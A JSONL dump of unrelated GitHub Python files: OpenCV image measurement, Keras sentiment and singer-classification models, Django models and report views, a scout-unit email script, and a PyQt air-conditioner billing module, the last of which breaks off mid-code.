+{"seq_id":"15731535153","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 15 09:39:43 2017\n\n@author: mkeranen\n\nDiameter measurement work - need to optimize binarize, segment out main diameter\nCurrently finds largest contour in range and drops fits a circle in.\n\"\"\"\n\n# import the necessary packages\nfrom scipy.spatial import distance as dist\nfrom imutils import perspective\nfrom imutils import contours\nimport numpy as np\nimport argparse\nimport imutils\nimport cv2\n\ndef midpoint(ptA, ptB):\n\treturn ((ptA[0] + ptB[0]) * 0.5, (ptA[1] + ptB[1]) * 0.5)\n\n# load the image to process\nimage = cv2.imread('circles.png')\n\n#Resize img to fit computer screen better\nimage = cv2.resize(image, (int(image.shape[1]/4), int(image.shape[0]/4)))\n\n#Process image --> grayscale --> binarize --> Gaussian Blur\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\nbinarized = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\ngrayblur = cv2.GaussianBlur(binarized[1], (7, 7), 0)\n\n##Uncomment to display previous 3 operations\n#cv2.imshow(\"Original Image\", image)\n#cv2.waitKey(0)\n#\n#cv2.imshow(\"Converted to Grayscale\", gray)\n#cv2.waitKey(0)\n#\n\n#cv2.imshow(\"Binarized\", binarized[1])\n#cv2.waitKey(0)\n#\n#cv2.imshow(\"Gaussian Blur\", grayblur)\n#cv2.waitKey(0)\n\n\n\n\nedgedCanny2 = cv2.Canny(grayblur, 50, 100)\n\nedgedDilate = cv2.dilate(edgedCanny2, None, iterations=1)\nedgedErode = cv2.erode(edgedDilate, None, iterations=1)\nimg = edgedCanny2.copy()\n#Show image operations\n#cv2.imshow(\"Canny Edge Detection - blur\", edgedCanny2)\n#cv2.waitKey(0)\n\n\n#Convert latest image back to color to allow colored contour lines\nimg = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n\n#Find contours on grayscale image\ncnts = cv2.findContours(edgedCanny2.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\ncnts = cnts[1]\nnewCnts = []\ncircleList = []\n\n#Process contours by arc length and circle size\nfor c in cnts:\n circle = cv2.minEnclosingCircle(c)\n if cv2.arcLength(c,1)>100 and circle[1]>100:\n newCnts.append(c)\n circleList.append(circle)\n\n#Find max radius of circle enclosing the contours\nmaxRadius = 0\nfor radius in circleList:\n if radius[1] > maxRadius:\n maxRadius = radius[1]\n maxCenter = radius[0]\n\n#Draw the max bounding circle\nimg = cv2.circle(img.copy(), (int(maxCenter[0]),int(maxCenter[1])), int(maxRadius), (0,0,255), 3)\n#Draw contours on color image\nimg = cv2.drawContours(img.copy(), newCnts, -1, (0,255,0), 1)\n#Show contours\ncv2.imshow(\"Countour Plot\",img)\ncv2.waitKey(0)\n","repo_name":"mkeranen/CV_Diameter_Measurement","sub_path":"dia_msmt_mk.py","file_name":"dia_msmt_mk.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"44678310424","text":"import graphics\nimport math\n\nwin = graphics.GraphWin(\"Graphics Window\", 500, 500)\n\npt0 = graphics.Point(275, 250)\npt30 = graphics.Point(250 + 40 * math.cos(math.pi/6), 250 - 40 * math.sin(math.pi/6))\npt60 = graphics.Point(250 + 60 * math.cos(math.pi/3), 250 - 60 * math.sin(math.pi/3))\npt90 = graphics.Point(250, 200)\npt120 = graphics.Point(250 - (30 * math.cos(math.pi/3)), 250 - (30 * math.sin(math.pi/3)))\npt150 = graphics.Point(250, 250)\n\n\ncir = graphics.Circle(pt0, 5)\ncir2 = graphics.Circle(pt30, 5)\ncir3 = graphics.Circle(pt60, 5)\ncir4 = graphics.Circle(pt90, 5)\ncir5 = graphics.Circle(pt120, 5)\ncir6 = graphics.Circle(pt150, 5)\ncirEnc = graphics.Circle(graphics.Point(250, 250), 100)\n\nlineVert = graphics.Line(graphics.Point(250, 150), graphics.Point(250,350))\nlineHoriz = graphics.Line(graphics.Point(150, 250), graphics.Point(350, 250))\nline30 = graphics.Line(graphics.Point(250 - (100 * math.cos(math.pi/6)), (250 + 100 * (math.sin(math.pi/6)))), graphics.Point(250 + (100 * math.cos(math.pi/6)), 250 - (100 * math.sin(math.pi/6))))\nline60 = graphics.Line(graphics.Point(250 - (100 * math.cos(math.pi/3)), (250 + 100 * (math.sin(math.pi/3)))), graphics.Point(250 + (100 * math.cos(math.pi/3)), 250 - (100 * math.sin(math.pi/3))))\nline120 = graphics.Line(graphics.Point(250 - (100 * math.cos(math.pi/3)), (250 - 100 * (math.sin(math.pi/3)))), graphics.Point(250 + (100 * math.cos(math.pi/3)), 250 + (100 * math.sin(math.pi/3))))\nline150 = graphics.Line(graphics.Point(250 - (100 * math.cos(math.pi/6)), (250 - 100 * (math.sin(math.pi/6)))), graphics.Point(250 + (100 * math.cos(math.pi/6)), 250 + (100 * math.sin(math.pi/6))))\n\ncirEnc.draw(win)\ncir.draw(win)\ncir2.draw(win)\ncir3.draw(win)\ncir4.draw(win)\ncir5.draw(win)\ncir6.draw(win)\n\nlineVert.draw(win)\nlineHoriz.draw(win)\nline30.draw(win)\nline60.draw(win)\nline120.draw(win)\nline150.draw(win)\n\ndx = 0.1\ndy = -0.1\ndxDiag = 0.1 * math.sqrt(2) / 2\ndyDiag = 0.1 * math.sqrt(2) / 2\n\nwin.getMouse()\n\nwhile True:\n if cir.getCenter().getX() >= 350:\n dx = -0.1\n dy = 0.1\n dxDiag = 0.1 * math.sqrt(2) / 2\n dyDiag = 0.1 * math.sqrt(2) / 2\n if cir.getCenter().getX() <= 150:\n dx = -dx\n dy = -dy\n dxDiag = -dxDiag\n dyDiag = -dyDiag\n\n cir.move(dx, 0)\n cir2.move(-dx, 0)\n cir3.move(0, dy)\n cir4.move(0, -dy)\n cir5.move(dxDiag, dyDiag)\n cir6.move(-dxDiag, dyDiag)\n\n\n","repo_name":"crosenblatt/Python-Gifs","sub_path":"Circles.py","file_name":"Circles.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"25159912456","text":"import pandas as pd\n\nreviews = pd.read_csv(\"IMDB Dataset.csv\")\nreviews.head()\nreviews.shape\n# (50000, 2)\n\nimport re\nfrom sklearn.feature_extraction import text\n\nstop_words = text.ENGLISH_STOP_WORDS\n\ndef clean_review(review, stopwords):\n html_tag = re.compile('<.*?>')\n cleaned_review = re.sub(html_tag, \"\", review).split()\n cleaned_review = [i for i in cleaned_review if i not in stopwords]\n return \" \".join(cleaned_review)\n\n## before cleaning\ntext = reviews.review[0]\nprint(text[:200])\n# One of the other reviewers has mentioned that after watching just 1 Oz episode you'll be hooked. They are right, as this is exactly what happened with me. The first thing that struck me abo\n\n## after cleaning\ncleaned_text = clean_review(text, stop_words)\nprint(cleaned_text[:200])\n# One reviewers mentioned watching just 1 Oz episode you'll hooked. They right, exactly happened me.The thing struck Oz brutality unflinching scenes violence, set right word GO. Trust me, faint hearted\n\n## cleaning the review column\nreviews[\"cleaned_review\"] = reviews[\"review\"].apply(lambda x: clean_review(x, stop_words))\n\nfrom keras.preprocessing.text import Tokenizer\n\n## maximum words to keep based on frequency \nmax_features = 5000\n## replace out-of-vocab words with this\noov = \"OOV\"\ntokenizer = Tokenizer(num_words = max_features, oov_token = oov)\ntokenizer.fit_on_texts(reviews[\"cleaned_review\"])\n## convert text into integers\ntokenized = tokenizer.texts_to_sequences(reviews[\"cleaned_review\"])\n\nfrom sklearn.preprocessing import LabelEncoder\n\ndef sentiment_encode(df, column, le):\n le.fit(df[column])\n sentiment_le = le.transform(df[column])\n return sentiment_le, le\n\nle = LabelEncoder()\nsentiment_le, le = sentiment_encode(reviews, \"sentiment\", le)\nprint(len(le.classes_))\n# 2\nle.classes_\n# array(['negative', 'positive'], dtype=object)\n\nfrom keras.preprocessing import sequence\n\nmax_len = 500\nXtrain = sequence.pad_sequences(tokenized, maxlen = max_len)\n\nfrom sklearn.model_selection import train_test_split\n\n## we will do the splitting using a random state to ensure same splitting every time\nX_train, X_test, y_train, y_test = train_test_split(Xtrain, sentiment_le, \n test_size = .5,\n random_state = 13)\n \n## importing\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM, Bidirectional, Dropout\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers.convolutional import Conv1D, MaxPooling1D\n\n## model parameters\nvocab_size = max_features #5000\nembedding_dims = 128 # dimensions to which text will be represented\nnum_epochs = 3\nnoutput = len(le.classes_) #2 (binary)\n\n## model\nmodel = Sequential()\n# embedding layer (vocab_size is the total number of words in data,\n# then the embedding dimensions we specified, then the maximum length of one review)\nmodel.add(Embedding(vocab_size, embedding_dims, input_length = max_len))\n# CNN\nmodel.add(Conv1D(128, kernel_size = 4, input_shape = (vocab_size, embedding_dims),\n activation = \"relu\"))\n# max pooling layer\nmodel.add(MaxPooling1D(pool_size = 3))\n# bidirectional LSTM\nmodel.add(Bidirectional(LSTM(64, return_sequences = True)))\n# LSTM and droput\nmodel.add(LSTM(32, recurrent_dropout = 0.4))\nmodel.add(Dropout(0.2))\n# 1 neuron output layer and sigmoid activation (binary 0 or 1)\nmodel.add(Dense(noutput - 1, activation = \"sigmoid\"))\n# model summary and layout\nmodel.summary()\n\n# adam optimizer and binary crossentropy\nmodel.compile(loss = 
\"binary_crossentropy\", metrics = [\"accuracy\"],\n optimizer = \"adam\")\n\nmodel.fit(X_train, y_train, epochs = num_epochs,\n batch_size = 32,\n validation_data = (X_test[:1000], y_test[:1000]),\n verbose = 1)\n\nresults = model.evaluate(X_test[1000:], y_test[1000:])\n# 750/750 [==============================] - 51s 65ms/step - loss: 0.3550 - accuracy: 0.8637\nprint(\"test loss: %.2f\" % results[0])\n# test loss: 0.36\nprint(\"test accuracy: %.2f%%\" % (results[1] * 100))\n# test accuracy: 86.37%","repo_name":"MNoorFawi/sentiment-prediction-using-cnn-and-lstm-in-keras","sub_path":"full_code.py","file_name":"full_code.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"73443813872","text":"#Meload librari librosa yang digunakan untuk mfcc\nimport librosa \nimport librosa.feature #librosafeature adalah untuk meload feature dari librosa\nimport librosa.display #mengambil function display pada librosa\nimport glob #adalah modul pada python yang biasa digunakan meload segaala jenis format file salah satunya musik\nimport numpy as np #mengimport numpy sebagai np yang digunakan untuk arry musik\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation\nfrom keras.utils.np_utils import to_categorical\n\ndef display_mfcc(song): #function dengan impatn song\n y, _ = librosa.load(song) #variable y meload variable song\n mfcc = librosa.feature.mfcc(y) #feature mfcc untuk melakukan konversi audio menjadi bntuk vektor\n\n plt.figure(figsize=(10, 4))\n librosa.display.specshow(mfcc, x_axis='time', y_axis='mel')\n plt.colorbar()\n plt.title(song)\n plt.tight_layout()\n plt.show()\n\ndisplay_mfcc('lagu/viavallen/viavallen_wegahelangan.mp3') #memanggil fungsi display mfcc untuk ploating dari audio yang akan dituju\n\ndisplay_mfcc('lagu/tulus/tulus_adurayu.mp3')\n\ndef extract_features_song(f):\n y, _ = librosa.load(f)\n # get Mel-frequency cepstral coefficients\n mfcc = librosa.feature.mfcc(y)\n # normalize values between -1,1 (divide by max)\n mfcc /= np.amax(np.absolute(mfcc))\n return np.ndarray.flatten(mfcc)[25000:]\n\nextract_features_song('lagu/tulus/tulus_adurayu.mp3')\n\nextract_features_song('lagu/viavallen/viavallen_wegahelangan.mp3')\n\ndef generate_features_and_labels():\n all_features = [] #variabel all feature berisi array yang kosong\n all_labels = [] #variable all label berisi array yang kosong\n\n lagu = ['viavallen', 'tulus', 'tompi', 'rossa', 'ran', 'nikeardila', 'momoland', 'kotak', 'itzy', 'andien'] #variable lagu ini kita sesuaikan dengan nama folder yang ada di gdrive dan berisikan folder yang ada di dalamnya\n for singer in lagu:\n sound_files = glob.glob('lagu/'+singer+'/*.mp3') #mengambil file dari folder lagu dan mengambil semua file yang ada didalannya jga ekstensinya\n print('Processing %d songs by %s ...' 
% (len(sound_files), singer))\n        \n        for f in sound_files:\n            features = extract_features_song(f)\n            all_features.append(features)\n            all_labels.append(singer)\n\n    # convert labels to one-hot encoding\n    label_uniq_ids, label_row_ids = np.unique(all_labels, return_inverse=True)\n    label_row_ids = label_row_ids.astype(np.int32, copy=False)\n    onehot_labels = to_categorical(label_row_ids, len(label_uniq_ids))\n    return np.stack(all_features), onehot_labels\n\nfeatures, labels = generate_features_and_labels()\n\nprint(np.shape(features))\nprint(np.shape(labels))\n\ntraining_split = 0.8\n\nalldata = np.column_stack((features, labels))\n\nnp.random.shuffle(alldata)\nsplitidx = int(len(alldata) * training_split)\ntrain, test = alldata[:splitidx,:], alldata[splitidx:,:]\n\nprint(np.shape(train))\nprint(np.shape(test))\n\ntrain_input = train[:,:-10]\ntrain_labels = train[:,-10:]\n\ntest_input = test[:,:-10]\ntest_labels = test[:,-10:]\n\nprint(np.shape(train_input))\nprint(np.shape(train_labels))\n\nprint(np.shape(test_input))\nprint(np.shape(test_labels))\n\nmodel = tf.keras.Sequential()\nmodel.add(tf.keras.layers.Dense(100, input_dim=np.shape(train_input)[1]))\nmodel.add(tf.keras.layers.Activation('relu'))\nmodel.add(tf.keras.layers.Dense(10))\nmodel.add(tf.keras.layers.Activation('softmax'))\nmodel.compile(optimizer='adam',\n              loss='categorical_crossentropy',\n              metrics=['accuracy'])\nprint(model.summary())\n\nmodel.fit(train_input, train_labels, epochs=10, batch_size=32,\n          validation_split=0.2)\n\nloss, acc = model.evaluate(test_input, test_labels, batch_size=32)\n\nprint(\"Done!\")\nprint(\"Loss: %.4f, accuracy: %.4f\" % (loss, acc))\n\n# save the trained model\nmodel.save(\"singers2.hdf5\")\n\nimport tensorflow as tf\n# load the saved model back from disk\nmodel2 = tf.keras.models.load_model(\"singers2.hdf5\")\nprint(model2.summary())\n\ndef predict(song_path):\n    song = np.stack([extract_features_song(song_path)])\n    # do the prediction\n    prediction = model2.predict(song, batch_size=32)\n\n    print(\"Prediction: %s, confidence: %.2f\" % (np.argmax(prediction), np.max(prediction)))\n\npredict('Uts/lagu/tompi/Tompi - Balonku.mp3')\n\npredict('Uts/lagu/tulus/TULUS - Pamit.mp3')\n\nfrom sklearn.metrics import confusion_matrix\npred_labels = model2.predict(test_input)\ncm = confusion_matrix(test_labels.argmax(axis=1), pred_labels.argmax(axis=1))\ncm\n\nimport matplotlib.pyplot as plt\nimport itertools\ndef plot_confusion_matrix(cm, classes,\n                          normalize=False,\n                          title='Confusion matrix',\n                          cmap=plt.cm.Blues):\n    \"\"\"\n    This function prints and plots the confusion matrix.\n    Normalization can be applied by setting `normalize=True`.\n    \"\"\"\n    if normalize:\n        cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n        print(\"Normalized confusion matrix\")\n    else:\n        print('Confusion matrix, without normalization')\n\n    print(cm)\n    plt.figure(figsize=(6,6), dpi=100)\n    plt.imshow(cm, interpolation='nearest', cmap=cmap)\n    plt.title(title)\n    #plt.colorbar()\n    tick_marks = np.arange(len(classes))\n    plt.xticks(tick_marks, classes, rotation=90)\n    plt.yticks(tick_marks, classes)\n    \n    fmt = '.2f' if normalize else 'd'\n    thresh = cm.max() / 2.\n    #for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n    #    plt.text(j, i, format(cm[i, j], fmt),\n    #             horizontalalignment=\"center\",\n    #             color=\"white\" if cm[i, j] > thresh else \"black\")\n\n    plt.tight_layout()\n    plt.ylabel('True label')\n    plt.xlabel('Predicted label')\n\n\nimport numpy as np\n\nlagu = ['viavallen', 'tulus', 'tompi', 'rossa', 'ran', 'nikeardila', 'momoland', 'kotak', 'itzy', 'andien']\nplot_confusion_matrix(cm, 
classes=lagu, normalize=True)\nplt.show()","repo_name":"KecerdasanBuatan17/KB3C","sub_path":"uts/1174062/1174062.py","file_name":"1174062.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"4779525646","text":"from django.db import models\n\nclass Book(models.Model):\n title = models.CharField(max_length=200)\n date_publish= models.DateTimeField(default='')\n sammary=models.TextField(blank=True)\n country= models.TextField(blank=True)\n link = models.URLField(blank=True)\n Writer = models.ForeignKey(Writer,on_delete=models.CASCADE,default='')\n def __str__(self):\n return self.title\n\n\n\n class Meta:\n ordering =['title']\n","repo_name":"alaaalshamy/DjangoProject1","sub_path":"DjangoProject/liberary/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"71680669551","text":"import pandas as pd\n\nfrom utils import Utils\n\n\nclass Parser(object):\n def __init__(self, data: dict, key1: str = '21', key2: str = '22'):\n self._key1 = key1\n self._key2 = key2\n self._data = data\n\n def parse(self):\n items = self._data['table'].items()\n\n region_data = []\n\n for key, value in items:\n obj = dict({})\n obj['code'] = key\n obj['region'] = Utils.get_region_name_by_code(key)\n obj['value1'] = value[self._key1]\n obj['value2'] = value[self._key2]\n\n region_data.append(obj)\n\n return {\n 'time_server': self._data['ts'],\n 'total_nolsatu': float(self._data['chart'][self._key1]),\n 'total_noldua': float(self._data['chart'][self._key2]),\n 'process_tps': float(self._data['progress']['proses']),\n 'total_tps': float(self._data['progress']['total']),\n 'votings': region_data\n }\n\n def parse_to_csv_format(self):\n items = self._data['table'].items()\n res = []\n\n for key, value in items:\n obj = dict({})\n obj[Utils.get_region_name_by_code(key)] = {\n 'code': key,\n 'value1': value[self._key1],\n 'value2': value[self._key2]\n }\n res.append(obj)\n\n return res\n","repo_name":"ebysofyan/pantau","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"679247415","text":"\"\"\"Module for generating games by user report\"\"\"\nimport sqlite3\nfrom django.shortcuts import render\nfrom levelupapi.models import Game\nfrom levelupreports.views import Connection\n\ndef usergame_list(request):\n \"\"\"Function to build an HTML report of games by user\"\"\"\n if request.method == 'GET':\n # Connect to project database\n with sqlite3.connect(Connection.db_path) as conn:\n conn.row_factory = sqlite3.Row\n db_cursor = conn.cursor()\n\n # Query for all games, with related user info\n db_cursor.execute(\"\"\"\n SELECT\n g.id,\n g.name,\n g.game_type_id,\n g.num_players,\n g.skill_level,\n u.id user_id,\n u.first_name || ' ' || u.last_name AS full_name\n FROM\n levelupapi_game g\n JOIN\n levelupapi_gamer gr ON g.creator_id = gr.id\n JOIN\n auth_user u ON gr.user_id = u.id\n \"\"\")\n\n dataset = db_cursor.fetchall()\n\n games_by_user = {}\n\n for row in dataset:\n game = Game()\n game.name = row['name']\n game.game_type_id = row['game_type_id']\n game.num_players = row['num_players']\n game.skill_level = row['skill_level']\n\n uid = row['user_id']\n\n # If we've already encountered this user, add this game to their list of games\n if uid in games_by_user:\n games_by_user[uid]['games'].append(game)\n\n # Otherwise add a new key-value pair for this user\n else:\n games_by_user[uid] = {\n \"id\": uid,\n \"full_name\": row[\"full_name\"],\n \"games\": [ game ]\n }\n \n # dict.values() is akin to Object.values(obj) in JS\n list_of_users_with_games = games_by_user.values()\n\n # Specify Django template and provide data context\n template = 'users/list_with_games.html'\n context = {\n 'usergame_list': list_of_users_with_games\n }\n\n return render(request, template, context)\n","repo_name":"skratz17/levelup-server","sub_path":"levelupreports/views/users/gamesbyuser.py","file_name":"gamesbyuser.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"6652301045","text":"#!/usr/bin/python2\n\nimport os\nimport getopt\nimport sys\n#import pg\n#import string\nimport dbobj\n#from procs import *\n#import time\n#import datetime\nimport smtplib\nfrom email.MIMEText import MIMEText\nfrom email.MIMEMultipart import MIMEMultipart\n \n\n##############################################################################\ndef main():\n \"\"\"This program is intended to be called from office.py\nObtains the following parameters:\n ou_id\n subject\n msg_body\n user_id - person who sent the message\n\n \"\"\"\n \n error_file = open('/tmp/jim.log', 'w')\n testing = 1\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"\")\n\n param = dbobj.paramrec()\n db = dbobj.dbinstance(param.dbname)\n\n ou_id = int(args[0])\n subject = args[1]\n msg_body = args[2]\n user_id = args[3]\n\n if testing:\n error_file.write(\"OU id = %d, subject = '%s', msg_body = '%s', user_id = %s\\n\" % (ou_id, subject, msg_body, user_id))\n\n ourec = dbobj.ourec(db, ou_id)\n if not ourec.found:\n if testing:\n error_file.write('Error: OU not found - OU id = %d\\n' % ou_id)\n return\n \n maillist = []\n\n # get email addresses of members of ou\n mail_by_ou(ourec, maillist, db, error_file)\n error_file.write('No of Email addr = %d\\n' % len(maillist))\n\n #Get children ous\n children = ourec.child_list()\n for ch in children:\n mail_by_ou(ch, maillist, db, error_file)\n\n #if testing:\n error_file.write('No of Email addr = %d\\n' % len(maillist))\n\n\n \n # Get details of the logged in user\n user = dbobj.adultrec(db, user_id) \n if not user.found:\n error_file.write('Error: User not found - User id = %d\\n' % user_id)\n return\n \n maillist.append(user.email)\n \n # Open link to mail server\n mailserver = smtplib.SMTP(param.smtpserver)\n\n\n #Get the html header\n htmlfile = param.template_dir + '/' + param.email_header\n mf = open(htmlfile)\n html_header = mf.read()\n mf.close()\n\n error_file.write('html opened = %s\\n' % htmlfile)\n\n #Get the footer of the email\n footerfile = param.template_dir + '/' + param.email_footer\n mf = open(footerfile)\n html_footer = mf.read()\n mf.close()\n error_file.write('footer opened = %s\\n' % footerfile)\n\n msg_footer = ' ' % (param.baseurl, param.pythondir, ourec.ou_id, ourec.name)\n\n error_file.write('Set up mailserver and body\\n')\n\n\n #Cycle through the mail list\n for em in maillist:\n #error_file.write(em)\n # Create the mail message\n outer = MIMEMultipart()\n \n # Mail headers\n outer['Subject'] = subject\n #outer['From'] = user.email + \"<%s %s>\" % (user.forename, user.surname)\n outer['From'] = user.email\n outer['To'] = em\n outer.preamble = 'Scout unit mail message'\n outer.epilogue = ''\n \n # Attach the created file to the e-mail.\n msgfile = MIMEText(html_header + msg_body + msg_footer + html_footer, 'html')\n outer.attach(msgfile)\n \n #mailserver.set_debuglevel(1)\n mailserver.sendmail(user.email, em, outer.as_string())\n error_file.write('Send email to %s\\n' % em)\n\n # Send me a copy\n # Create the mail message\n outer = MIMEMultipart()\n \n # Mail headers\n outer['Subject'] = 'Copy of email to ' + ourec.name\n #outer['From'] = user.email + \"<%s %s>\" % (user.forename, user.surname)\n outer['From'] = user.email\n outer['To'] = 'scout@west.net.nz'\n outer.preamble = 'Scout unit mail message'\n outer.epilogue = ''\n\n html_body = html_header + 'Subject : %s Sent by : %s %s Message body : %s' %(subject, user.forename, user.surname, msg_body) + html_footer\n\n # Attach the created file to the e-mail.\n msgfile = 
MIMEText(html_body, 'html')\n        outer.attach(msgfile)\n\n        #mailserver.set_debuglevel(1)\n        # deliver the copy to the admin address from the To: header,\n        # not to the last recipient left over from the loop above\n        mailserver.sendmail(user.email, 'scout@west.net.nz', outer.as_string())\n\n\n        error_file.write('Finished sending email\\n')\n\n        # Finished the loop, close connection to mail server\n        mailserver.quit()\n\n        error_file.close()\n    except:\n        error_file = open('/tmp/email_error.log', 'w')\n        error_file.write('Error occurred')\n        error_file.close()\n        return\n\n##############################################################################\ndef mail_by_ou(ourec, maillist, db, ef):\n    \"\"\"Populates maillist parameter (which must be an array) with unique email addresses of members and parents.\nReceives four parameters\n    ourec - the OU being processed\n    maillist - the array for email addresses\n    db - the database instance\n    ef - the error/log file handle\n\"\"\"\n    ef.write('Entered mail_by_ou, ou_id = %d\\n' % ourec.ou_id)\n    membs = ourec.member_list(status = 'C')\n\n    for s in membs:\n        pers = dbobj.scoutrec(db, s.scout_id)\n        if pers.found:\n            if pers.email is not None and pers.email != '':\n                if maillist.count(pers.email) == 0:\n                    maillist.append(pers.email)\n            p1 = dbobj.adultrec(db, pers.parent1)\n            if p1.found != 0 and p1.email is not None and p1.email != '':\n                if maillist.count(p1.email) == 0:\n                    maillist.append(p1.email)\n            p2 = dbobj.adultrec(db, pers.parent2)\n            if p2.found != 0 and p2.email is not None and p2.email != '':\n                if maillist.count(p2.email) == 0:\n                    maillist.append(p2.email)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"Jimboeri/scout","sub_path":"py/unit-email.py","file_name":"unit-email.py","file_ext":"py","file_size_in_byte":5245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"877893091","text":"__author__ = 'Hk4Fun'\n__date__ = '2018/5/22 23:03'\nimport sys\n\nfrom PyQt5.QtWidgets import (QWidget, QHeaderView, QTableWidgetItem, QInputDialog)\n\nsys.path.append('..')\nfrom AirConditioningV2.ui import ui_Reporter\nfrom AirConditioningV2.ui import ui_Bill\nfrom AirConditioningV2.database import *\nfrom AirConditioningV2.logger import *\nfrom AirConditioningV2.filters import *\n\n\nclass DetailList():\n def __init__(self, ui, db):\n self.ui = ui\n self.db = db\n self.query = db.query\n self.showDetailList()\n\n def showDetailList(self, date=None):\n self.ui.tbDetail.clearContents()\n self.ui.tbDetail.setSortingEnabled(False) # http://doc.qt.io/qt-5/qtablewidget.html#setItem\n self.db.sqlExec('SELECT * FROM detail_list')\n row = 0\n while self.query.next():\n if date and not isEqDate(date, timeFormat(self.query.value(1))): continue\n self.ui.tbDetail.setRowCount(row + 1)\n self.ui.tbDetail.setItem(row, 0, QTableWidgetItem(self.query.value(0)))\n self.ui.tbDetail.setItem(row, 1, QTableWidgetItem(mapUserLevel_c2w(self.query.value(3))))\n self.ui.tbDetail.setItem(row, 2, QTableWidgetItem(timeFormat(self.query.value(1))))\n self.ui.tbDetail.setItem(row, 3, QTableWidgetItem(timeFormat(self.query.value(2))))\n self.ui.tbDetail.setItem(row, 4, QTableWidgetItem(durationFormat(self.query.value(1), self.query.value(2))))\n self.ui.tbDetail.setItem(row, 5, QTableWidgetItem(str(self.query.value(4))))\n self.ui.tbDetail.setItem(row, 6, QTableWidgetItem(str(self.query.value(5))))\n self.ui.tbDetail.setItem(row, 7, QTableWidgetItem(str(self.query.value(6))))\n self.ui.tbDetail.setItem(row, 8, QTableWidgetItem(str(self.query.value(7))))\n self.ui.tbDetail.setItem(row, 9, QTableWidgetItem(str(self.query.value(8))))\n self.ui.tbDetail.setItem(row, 10, QTableWidgetItem(isSettle(self.query.value(9))))\n row += 1\n self.ui.tbDetail.setSortingEnabled(True)\n\n def saveDetail(self, client):\n sql = 'INSERT INTO detail_list VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, client.roomId)\n self.query.bindValue(1, int(client.openTime))\n self.query.bindValue(2, int(client.closeTime))\n self.query.bindValue(3, client.userLevel)\n self.query.bindValue(4, client.tempAdjust)\n self.query.bindValue(5, client.tempBackCount)\n self.query.bindValue(6, client.speedAdjust)\n self.query.bindValue(7, round(client.energy, 2))\n self.query.bindValue(8, round(client.cost, 2))\n self.query.bindValue(9, '0') # 单号为0表示还未结算\n self.db.sqlExec()\n\n\nclass BillList():\n def __init__(self, ui, db):\n self.ui = ui\n self.db = db\n self.query = db.query\n self.ui.tbBillList.cellDoubleClicked.connect(self.showBill)\n self.showBillList()\n\n def showBillList(self, date=None):\n self.ui.tbBillList.clearContents()\n self.ui.tbBillList.setSortingEnabled(False)\n self.db.sqlExec('SELECT * FROM bill_list')\n totalIncome = 0\n row = 0\n while self.query.next():\n if date and not isEqDate(date, self.query.value(0)): continue\n self.ui.tbBillList.setRowCount(row + 1)\n self.ui.tbBillList.setItem(row, 0, QTableWidgetItem(self.query.value(0)))\n self.ui.tbBillList.setItem(row, 1, QTableWidgetItem(self.query.value(1)))\n self.ui.tbBillList.setItem(row, 2, QTableWidgetItem(self.query.value(2)))\n self.ui.tbBillList.setItem(row, 3, QTableWidgetItem(mapUserLevel_c2w(self.query.value(3))))\n self.ui.tbBillList.setItem(row, 4, QTableWidgetItem(str(round(self.query.value(4), 2))))\n self.ui.tbBillList.setItem(row, 5, QTableWidgetItem(discountFormat(self.query.value(5))))\n 
self.ui.tbBillList.setItem(row, 6, QTableWidgetItem(str(round(self.query.value(6), 2))))\n totalIncome += self.query.value(6)\n row += 1\n self.ui.tbBillList.setSortingEnabled(True)\n self.ui.label_totalIncome.setText(str(round(totalIncome, 2)))\n\n def showBill(self, row):\n orderId = self.ui.tbBillList.item(row, 1).text()\n self.bill = Bill(self.db, orderId)\n self.bill.show()\n\n def addBill(self, orderId, roomId, userLevel, cost):\n sql = 'INSERT INTO bill_list(orderID, roomID, userLevel, cost, discount, receive) VALUES (?, ?, ?, ?, ?, ?)'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, orderId)\n self.query.bindValue(1, roomId)\n self.query.bindValue(2, userLevel)\n self.query.bindValue(3, cost)\n self.query.bindValue(4, mapDiscount(userLevel))\n self.query.bindValue(5, cost * mapDiscount(userLevel))\n self.db.sqlExec()\n\n\nclass Bill(QWidget):\n def __init__(self, db, orderId):\n super().__init__()\n self.db = db\n self.query = self.db.query\n self.orderId = orderId\n self.initUi()\n\n def initUi(self):\n self.ui = ui_Bill.Ui_Form()\n self.ui.setupUi(self)\n self.ui.btPrinter.clicked.connect(self.printBill)\n self.showBill()\n\n def showBill(self):\n sql = 'SELECT * FROM bill_list WHERE orderID = ?'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, self.orderId)\n self.db.sqlExec()\n self.query.next()\n 